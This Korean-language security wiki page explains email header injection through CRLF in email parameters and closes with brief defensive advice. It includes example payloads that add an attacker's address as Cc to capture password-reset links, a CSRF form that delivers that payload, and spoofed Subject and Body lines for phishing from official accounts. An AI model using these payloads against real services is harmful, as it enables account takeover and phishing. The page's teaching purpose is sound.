🔍 Introduction

Email Injection은 Application에서 사용자로 부터 받은 입력 값이 Email을 처리하는데 사용되고 입력 값에 대한 검증이 미흡한 경우 공격자가 악의적인 파라미터로 메일 내용 등을 변조할 수 있는 공격 방법입니다.

{
    "email":"sender@domain.com%0ACc:attacker@domain.com"
}

공격이 성공한다면 공식 계정 사칭이나 피싱 등에 활용될 수 있고, 연관된 시스템에 따라서 계정 탈취 등에 사용될 수 있습니다.

🗡 Offensive techniques

Detect

초대, 안내 등 웹 요청 이후에 이메일이 전송되는 모든 구간은 Email Injection의 영향을 받을 수 있습니다.

POST /invite HTTP/1.1

email=hahwul@gmail.com

email 파라미터를 통해 받은 값이 SMTP 등 메일 전송 시스템을 통해 전송될 때 입력 값에 대한 검증이 없다면 CRLF(개행문자)등을 이용하여 Email의 송/수신인, 내용 등을 변조할 수 있게 됩니다.

POST /invite HTTP/1.1

email=hahwul@gmail.com%0ASubject:Fake%20Subject

Exploitation

Stealing sensitive inforamation

CSRF 등의 취약점과 조합되면 패스워드 재 설정 시 발생하는 메일이나 2FA 인증 값 등 민감한 정보를 탈취할 수 있습니다.

POST /invite HTTP/1.1

email=victim@domain.com%0ACc:attacker@domain.com

메일을 발생시키는 요청 시 Email Injection하여 공격자의 메일에도 Cc로 데이터가 전달될 수 있도록 공격코드를 구성한다면 피해자가 CSRF 코드 접근 시 비밀번호 재생성 링크 등을 공격자의 메일로도 전달할 수 있어 계정 탈취 등의 이슈와 연결될 수 있습니다.

<form arciton="https://weakness-service/findPassword" method="post">
    <input type=text name="email" value="victim@domain.com%0ACc:attacker@domain.com">
</form>

Subject, Body를 조작하여 피싱 메일 구성

Email Injection이 가능한 메일이 noreply@blahblah 등 공식 계정으로 전송되는 경우 Subject, Body 등을 조작하여 공식 계정에서의 피싱 메일을 구성할 수 있습니다.

POST /notify HTTP/1.1

email=victim@domain.com%0ASubjack:Important%20Security%20Alerts%0A%0AFake%20Message!

RCE

Mail 전송을 위해서 Command-line으로 다른 Mail Application을 처리하는 경우가 있습니다. 대표적으로 PHP Cli의 mail() 함수도 비슷하죠.

이러한 경우 Command Injection과 동일하게 해당 과정에서 특수문자에 대한 처리가 미흡하다면 이를 통해 최종적으로 RCE까지 이어질 수 있습니다.

🛡 Defensive techniques

사용자로 부터 Email 전송에 사용되는 데이터를 받아 처리하는 경우 지정된 포맷의 데이터 이외에는 처리하지 않도록 제한하는 것이 좋습니다. 특히 개행문자의 경우 여러가지 Exploit 포인트를 만들 수 있기 때문에 꼭 처리하는 것이 좋습니다.

📌 References

• https://en.wikipedia.org/wiki/Email_injection
• https://exploitbox.io/paper/Pwning-PHP-Mail-Function-For-Fun-And-RCE.html
• https://www.hahwul.com/cullinan/crlf-injection/#-defensive-techniques